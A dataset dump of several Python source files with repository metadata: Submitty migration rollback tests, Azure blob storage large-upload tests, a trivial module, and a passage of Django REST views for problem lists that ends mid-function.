| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
453d84d55aa09282116e6b932a3650535993a905
| 13,446
|
py
|
Python
|
migration/tests/test_migrate_environment_down.py
|
elihschiff/Submitty
|
8b980997b6f1dfcd73eb4cf4cca43398e67f96dc
|
[
"BSD-3-Clause"
] | 411
|
2016-06-14T20:52:25.000Z
|
2022-03-31T21:20:25.000Z
|
migration/tests/test_migrate_environment_down.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 5,730
|
2016-05-23T21:04:32.000Z
|
2022-03-31T10:08:06.000Z
|
migration/tests/test_migrate_environment_down.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 423
|
2016-09-22T21:11:30.000Z
|
2022-03-29T18:55:28.000Z
|
from argparse import Namespace
from io import StringIO
from pathlib import Path
import shutil
import sys
import tempfile
from types import SimpleNamespace
import unittest
from .helpers import create_migration
import migrator
import migrator.db
import migrator.main
class TestMigrateEnvironmentDown(unittest.TestCase):
def setUp(self):
self.stdout = sys.stdout
sys.stdout = StringIO()
self.dir = tempfile.mkdtemp()
self.old_migrations_path = migrator.MIGRATIONS_PATH
migrator.MIGRATIONS_PATH = Path(self.dir)
def tearDown(self):
sys.stdout = self.stdout
shutil.rmtree(self.dir)
migrator.MIGRATIONS_PATH = self.old_migrations_path
def setup_test(self, environment):
Path(self.dir, environment).mkdir()
self.database = migrator.db.Database({'database_driver': 'sqlite'}, environment)
self.database.DynamicBase.metadata.create_all(self.database.engine)
def test_rollback_system(self):
environment = 'system'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = None
create_migration(self.database, self.dir, environment, '01_test1.py')
create_migration(self.database, self.dir, environment, '02_test1.py')
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 0)
self.assertEqual("""Running down migrations for system... 02_test1
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test1', '02_test1']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
def test_rollback_master(self):
environment = 'master'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = None
create_migration(self.database, self.dir, environment, '01_test2.py')
create_migration(self.database, self.dir, environment, '02_test2.py')
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 0)
self.assertEqual("""Running down migrations for master... 02_test2
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test2', '02_test2']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
def test_rollback_course(self):
environment = 'course'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.semester = 'f18'
args.course = 'csci1100'
args.config = None
create_migration(self.database, self.dir, environment, '01_test3.py')
create_migration(self.database, self.dir, environment, '02_test3.py')
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 0)
self.assertEqual("""Running down migrations for f18.csci1100... 02_test3
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test3', '02_test3']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
def test_missing_migration(self):
environment = 'master'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = SimpleNamespace()
install_path = Path(self.dir, 'install')
Path(install_path, 'migrations', environment).mkdir(parents=True)
args.config.submitty = {
'submitty_install_dir': str(install_path)
}
missing_migration = Path(install_path, 'migrations', environment, '02_test4.py')
with missing_migration.open('w') as open_file:
open_file.write("""
# pragma: no cover
from pathlib import Path
INSTALL_PATH = "{}"
def down(*_):
with Path(INSTALL_PATH, 'test.txt').open('w') as open_file:
open_file.write('test')
""".format(install_path))
create_migration(self.database, self.dir, environment, '01_test4.py')
create_migration(self.database, self.dir, environment, '02_test4.py', 1, False)
create_migration(self.database, self.dir, environment, '03_test4.py')
create_migration(self.database, self.dir, environment, '04_test4.py', 0)
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 1)
self.assertEqual("""Running down migrations for master...
Removing 1 missing migrations:
02_test4
03_test4
DONE
""", sys.stdout.getvalue())
self.assertTrue(missing_migration.exists())
self.assertEqual(list(missing_migrations)[0], missing_migration)
self.assertTrue(Path(install_path, 'test.txt').exists())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test4', '03_test4', '04_test4']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
def test_missing_migration_not_up(self):
environment = 'master'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = SimpleNamespace()
install_path = Path(self.dir, 'install')
Path(install_path, 'migrations', environment).mkdir(parents=True)
args.config.submitty = {
'submitty_install_dir': str(install_path)
}
missing_migration = Path(install_path, 'migrations', environment, '02_test4.py')
with missing_migration.open('w') as open_file:
open_file.write("""
# pragma: no cover
from pathlib import Path
INSTALL_PATH = "{}"
def down(*_):
with Path(INSTALL_PATH, 'test.txt').open('w') as open_file:
open_file.write('test')
""".format(install_path))
create_migration(self.database, self.dir, environment, '01_test4.py')
create_migration(self.database, self.dir, environment, '02_test4.py', 0, False)
create_migration(self.database, self.dir, environment, '03_test4.py')
create_migration(self.database, self.dir, environment, '04_test4.py', 0)
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 1)
self.assertEqual("""Running down migrations for master...
Removing 1 missing migrations:
02_test4
03_test4
DONE
""", sys.stdout.getvalue())
self.assertEqual(list(missing_migrations)[0], missing_migration)
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test4', '03_test4', '04_test4']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
self.assertTrue(missing_migration.exists())
self.assertFalse(Path(install_path, 'test.txt').exists())
def test_missing_migration_no_file(self):
environment = 'master'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = SimpleNamespace()
install_path = Path(self.dir, 'install')
Path(install_path, 'migrations', environment).mkdir(parents=True)
args.config.submitty = {
'submitty_install_dir': str(install_path)
}
create_migration(self.database, self.dir, environment, '01_test6.py')
create_migration(self.database, self.dir, environment, '02_test6.py', 1, False)
create_migration(self.database, self.dir, environment, '03_test6.py')
create_migration(self.database, self.dir, environment, '04_test6.py', 0)
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 1)
self.assertEqual("""Running down migrations for master...
Removing 1 missing migrations:
02_test6
03_test6
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test6', '03_test6', '04_test6']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertEqual(i == 1, Path(self.dir, down_file).exists())
def test_cannot_rollback_first_migration(self):
environment = 'master'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = None
create_migration(self.database, self.dir, environment, '01_test5.py')
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 0)
self.assertEqual("""Running down migrations for master... Cannot rollback 01_test5
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test5']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertFalse(Path(self.dir, down_file).exists())
def test_fake_rollback(self):
environment = 'system'
self.setup_test(environment)
args = Namespace()
args.direction = 'down'
args.config = None
args.set_fake = True
create_migration(self.database, self.dir, environment, '01_test1.py')
create_migration(self.database, self.dir, environment, '02_test1.py')
missing_migrations = set()
migrator.main.migrate_environment(
self.database,
environment,
args,
missing_migrations
)
self.assertEqual(len(missing_migrations), 0)
self.assertEqual("""Running down migrations for system... 02_test1 (FAKE)
DONE
""", sys.stdout.getvalue())
rows = self.database.session.query(self.database.migration_table).all()
expected_rows = ['01_test1', '02_test1']
self.assertEqual(len(rows), len(expected_rows))
for i in range(len(rows)):
row = rows[i]
self.assertEqual(expected_rows[i], row.id)
self.assertEqual(1 if i < 1 else 0, row.status)
self.assertIsNotNone(row.commit_time)
down_file = expected_rows[i] + '.py.down.txt'
self.assertFalse(0, Path(self.dir, down_file).exists())
| 38.417143
| 91
| 0.632307
| 1,562
| 13,446
| 5.279129
| 0.076825
| 0.069852
| 0.048023
| 0.068761
| 0.885642
| 0.875819
| 0.857264
| 0.857264
| 0.841014
| 0.816032
| 0
| 0.021441
| 0.250781
| 13,446
| 349
| 92
| 38.527221
| 0.797101
| 0
| 0
| 0.760252
| 0
| 0
| 0.125985
| 0.006545
| 0
| 0
| 0
| 0
| 0.195584
| 1
| 0.0347
| false
| 0
| 0.044164
| 0
| 0.082019
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1896fe58fc9de5840094c5361a7120ac499b599a
| 16,857
|
py
|
Python
|
sdk/storage/azure-storage-blob/tests/test_large_block_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1
|
2021-04-26T21:15:01.000Z
|
2021-04-26T21:15:01.000Z
|
sdk/storage/azure-storage-blob/tests/test_large_block_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2
|
2021-08-24T15:32:30.000Z
|
2021-08-24T23:21:34.000Z
|
sdk/storage/azure-storage-blob/tests/test_large_block_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1
|
2016-04-19T22:15:47.000Z
|
2016-04-19T22:15:47.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
from os import path, remove, sys, urandom
import platform
import unittest
import uuid
from devtools_testutils import ResourceGroupPreparer, StorageAccountPreparer
from azure.storage.blob import (
BlobServiceClient,
ContainerClient,
BlobClient,
ContentSettings
)
if sys.version_info >= (3,):
from io import BytesIO
else:
from cStringIO import StringIO as BytesIO
from _shared.testcase import GlobalStorageAccountPreparer
from devtools_testutils.storage import StorageTestCase
# ------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'largeblob'
LARGE_BLOB_SIZE = 12 * 1024 * 1024
LARGE_BLOCK_SIZE = 6 * 1024 * 1024
# ------------------------------------------------------------------------------
if platform.python_implementation() == 'PyPy':
pytest.skip("Skip tests for Pypy", allow_module_level=True)
class StorageLargeBlockBlobTest(StorageTestCase):
def _setup(self, storage_account, key):
# test chunking functionality by reducing the threshold
# for chunking and the size of each chunk, otherwise
# the tests would take too long to execute
self.bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
credential=key,
max_single_put_size=32 * 1024,
max_block_size=2 * 1024 * 1024,
min_large_block_upload_threshold=1 * 1024 * 1024)
self.config = self.bsc._config
self.container_name = self.get_resource_name('utcontainer')
if self.is_live:
try:
self.bsc.create_container(self.container_name)
except:
pass
def _teardown(self, file_name):
if path.isfile(file_name):
try:
remove(file_name)
except:
pass
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name(TEST_BLOB_PREFIX)
def _create_blob(self):
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(b'')
return blob
def assertBlobEqual(self, container_name, blob_name, expected_data):
blob = self.bsc.get_blob_client(container_name, blob_name)
actual_data = blob.download_blob()
self.assertEqual(b"".join(list(actual_data.chunks())), expected_data)
# --Test cases for block blobs --------------------------------------------
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_put_block_bytes_large(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self._create_blob()
# Act
for i in range(5):
resp = blob.stage_block(
'block {0}'.format(i).encode('utf-8'), urandom(LARGE_BLOCK_SIZE))
self.assertIsNotNone(resp)
assert 'content_md5' in resp
assert 'content_crc64' in resp
assert 'request_id' in resp
# Assert
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_put_block_bytes_large_with_md5(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self._create_blob()
# Act
for i in range(5):
resp = blob.stage_block(
'block {0}'.format(i).encode('utf-8'),
urandom(LARGE_BLOCK_SIZE),
validate_content=True)
self.assertIsNotNone(resp)
assert 'content_md5' in resp
assert 'content_crc64' in resp
assert 'request_id' in resp
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_put_block_stream_large(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self._create_blob()
# Act
for i in range(5):
stream = BytesIO(bytearray(LARGE_BLOCK_SIZE))
resp = resp = blob.stage_block(
'block {0}'.format(i).encode('utf-8'),
stream,
length=LARGE_BLOCK_SIZE)
self.assertIsNotNone(resp)
assert 'content_md5' in resp
assert 'content_crc64' in resp
assert 'request_id' in resp
# Assert
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_put_block_stream_large_with_md5(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob = self._create_blob()
# Act
for i in range(5):
stream = BytesIO(bytearray(LARGE_BLOCK_SIZE))
resp = resp = blob.stage_block(
'block {0}'.format(i).encode('utf-8'),
stream,
length=LARGE_BLOCK_SIZE,
validate_content=True)
self.assertIsNotNone(resp)
assert 'content_md5' in resp
assert 'content_crc64' in resp
assert 'request_id' in resp
# Assert
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_path(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'large_blob_from_path.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, max_concurrency=2, overwrite=True)
block_list = blob.get_block_list()
# Assert
self.assertIsNot(len(block_list), 0)
self.assertBlobEqual(self.container_name, blob_name, data)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_path_with_md5(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = "blob_from_path_with_md5.temp.dat"
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, validate_content=True, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_path_non_parallel(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(self.get_random_bytes(100))
FILE_PATH = "blob_from_path_non_parallel.temp.dat"
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, max_concurrency=1)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_path_with_progress(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = "blob_from_path_with_progress.temp.dat"
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
progress = []
def callback(response):
current = response.context['upload_stream_current']
total = response.context['data_stream_total']
if current is not None:
progress.append((current, total))
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, max_concurrency=2, raw_response_hook=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self.assert_upload_progress(len(data), self.config.max_block_size, progress)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_path_with_properties(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'blob_from_path_with_properties.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
content_settings = ContentSettings(
content_type='image/png',
content_language='spanish')
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, content_settings=content_settings, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
properties = blob.get_blob_properties()
self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_stream_chunked_upload(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'blob_from_stream_chunked_upload.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_creat_lrgblob_frm_stream_w_progress_chnkd_upload(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'stream_w_progress_chnkd_upload.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
progress = []
def callback(response):
current = response.context['upload_stream_current']
total = response.context['data_stream_total']
if current is not None:
progress.append((current, total))
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, max_concurrency=2, raw_response_hook=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self.assert_upload_progress(len(data), self.config.max_block_size, progress)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_create_large_blob_from_stream_chunked_upload_with_count(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'chunked_upload_with_count.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
blob_size = len(data) - 301
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, length=blob_size, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_creat_lrgblob_frm_strm_chnkd_uplod_w_count_n_props(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'plod_w_count_n_props.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
content_settings = ContentSettings(
content_type='image/png',
content_language='spanish')
blob_size = len(data) - 301
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(
stream, length=blob_size, content_settings=content_settings, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
properties = blob.get_blob_properties()
self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_creat_lrg_blob_frm_stream_chnked_upload_w_props(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
data = bytearray(urandom(LARGE_BLOB_SIZE))
FILE_PATH = 'creat_lrg_blob.temp.{}.dat'.format(str(uuid.uuid4()))
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
content_settings = ContentSettings(
content_type='image/png',
content_language='spanish')
with open(FILE_PATH, 'rb') as stream:
blob.upload_blob(stream, content_settings=content_settings, max_concurrency=2)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
properties = blob.get_blob_properties()
self.assertEqual(properties.content_settings.content_type, content_settings.content_type)
self.assertEqual(properties.content_settings.content_language, content_settings.content_language)
self._teardown(FILE_PATH)
# ------------------------------------------------------------------------------
| 41.114634
| 139
| 0.661684
| 1,995
| 16,857
| 5.269173
| 0.110777
| 0.077245
| 0.046899
| 0.074581
| 0.835616
| 0.822869
| 0.816781
| 0.816781
| 0.816781
| 0.816781
| 0
| 0.007661
| 0.225663
| 16,857
| 410
| 140
| 41.114634
| 0.797671
| 0.095687
| 0
| 0.705882
| 0
| 0
| 0.050151
| 0.026392
| 0
| 0
| 0
| 0
| 0.128028
| 1
| 0.072664
| false
| 0.00692
| 0.038062
| 0.00346
| 0.121107
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
18ef7f86cf11c7a37538f317297da5c2a7006aca
| 9
|
py
|
Python
|
tests/data/minimize_samples/mod_min.py
|
msaladna/mitogen
|
c6824b68181729cb16c090e72f4d35d6c4d95523
|
[
"BSD-3-Clause"
] | 1,526
|
2017-09-15T18:49:40.000Z
|
2021-01-17T16:04:12.000Z
|
tests/data/minimize_samples/mod_min.py
|
msaladna/mitogen
|
c6824b68181729cb16c090e72f4d35d6c4d95523
|
[
"BSD-3-Clause"
] | 682
|
2017-09-11T17:43:12.000Z
|
2021-01-17T05:26:26.000Z
|
tests/data/minimize_samples/mod_min.py
|
msaladna/mitogen
|
c6824b68181729cb16c090e72f4d35d6c4d95523
|
[
"BSD-3-Clause"
] | 111
|
2017-09-15T23:21:37.000Z
|
2021-01-01T14:45:35.000Z
|
pass
| 1.5
| 4
| 0.444444
| 1
| 9
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.555556
| 9
| 5
| 5
| 1.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
7a07ae83af7f86eb956cc40bfcde4f5884cdbdd7
| 52,702
|
py
|
Python
|
codedigger/lists/views.py
|
prahasR/Backend
|
bde1b28a5c89ecc7205f244ad5644eae356a5517
|
[
"Apache-2.0"
] | null | null | null |
codedigger/lists/views.py
|
prahasR/Backend
|
bde1b28a5c89ecc7205f244ad5644eae356a5517
|
[
"Apache-2.0"
] | null | null | null |
codedigger/lists/views.py
|
prahasR/Backend
|
bde1b28a5c89ecc7205f244ad5644eae356a5517
|
[
"Apache-2.0"
] | null | null | null |
from rest_framework import generics, status, permissions, views, response, mixins
from .models import ListInfo, Solved, List, ListExtraInfo, LadderStarted
from problem.models import Problem
from user.models import User, Profile
from .serializers import (GetLadderSerializer, GetSerializer,
GetUserlistSerializer, EditUserlistSerializer,
CreateUserlistSerializer, ProblemSerializer,
UserlistAddSerializer, UpdateLadderSerializer,
UpdateListSerializer, AddProblemsAdminSerializer)
from django.db.models import Q
from .permissions import IsOwner
from .solved_update import codeforces, uva, atcoder, codechef, spoj, atcoder_scraper_check
from .cron import updater, cron_atcoder, cron_codechef, cron_codeforces, cron_spoj, cron_uva, codechef_list
from django.core.paginator import Paginator
from user.permissions import *
from user.exception import *
def getqs(qs, page_size, page):
qs = qs[page_size * (page - 1):page_size * page]
return qs
class TopicwiseGetListView(generics.ListAPIView):
serializer_class = GetSerializer
permission_classes = [AuthenticatedOrReadOnly]
queryset = List.objects.filter((Q(type_list='1') | Q(type_list='3'))
& Q(isTopicWise=True) & Q(public=True)
& Q(isAdmin=True))
def get_serializer_context(self, **kwargs):
data = super().get_serializer_context(**kwargs)
data['user'] = self.request.user
return data
class TopicWiseRetrieveView(views.APIView):
permission_classes = [AuthenticatedOrReadOnly]
def get_object(self, slug):
if List.objects.filter((Q(type_list='1') | Q(type_list='3'))
& Q(isTopicWise=True) & Q(public=True)
& Q(isAdmin=True) & Q(slug=slug)).exists():
return List.objects.get(slug=slug)
raise NotFoundException("The list with the given slug does not exist")
def get(self, request, slug):
curr_list = self.get_object(slug)
page = self.request.GET.get('page', None)
page_size = 6
description = curr_list.description
name = curr_list.name
difficulty = None
video_link = None
contest_link = None
editorial = None
if ListExtraInfo.objects.filter(curr_list=curr_list).exists():
qs = ListExtraInfo.objects.get(curr_list=curr_list)
difficulty = qs.difficulty
video_link = qs.video_link
contest_link = qs.contest_link
editorial = qs.editorial
problem_qs = curr_list.problem.all().order_by('rating', 'id')
total = curr_list.problem.all().count()
cnt = total // page_size
if total % page_size != 0:
cnt += 1
path = request.build_absolute_uri('/lists/topicwise/list/' +
str(slug) + '?')
user = self.request.user
if user.is_anonymous:
user = None
completed = True
if not page:
if cnt == 0:
return response.Response({'status': 'OK', 'result': []})
page = 1
temp = {'F': True, 'A': True, 'U': True}
while page <= cnt:
qs = getqs(problem_qs, page_size, page)
for ele in qs:
solve = Solved.objects.filter(user=user, problem=ele)
if not solve.exists():
if ele.platform == 'F' and temp['F']:
temp['F'] = False
codeforces(user)
elif ele.platform == 'A' and temp['A']:
temp['A'] = False
atcoder(user)
elif ele.platform == 'U' and temp['U']:
temp['U'] = False
uva(user)
elif ele.platform == 'S':
spoj(user, ele)
elif ele.platform == 'C':
codechef(user, ele)
for ele in qs:
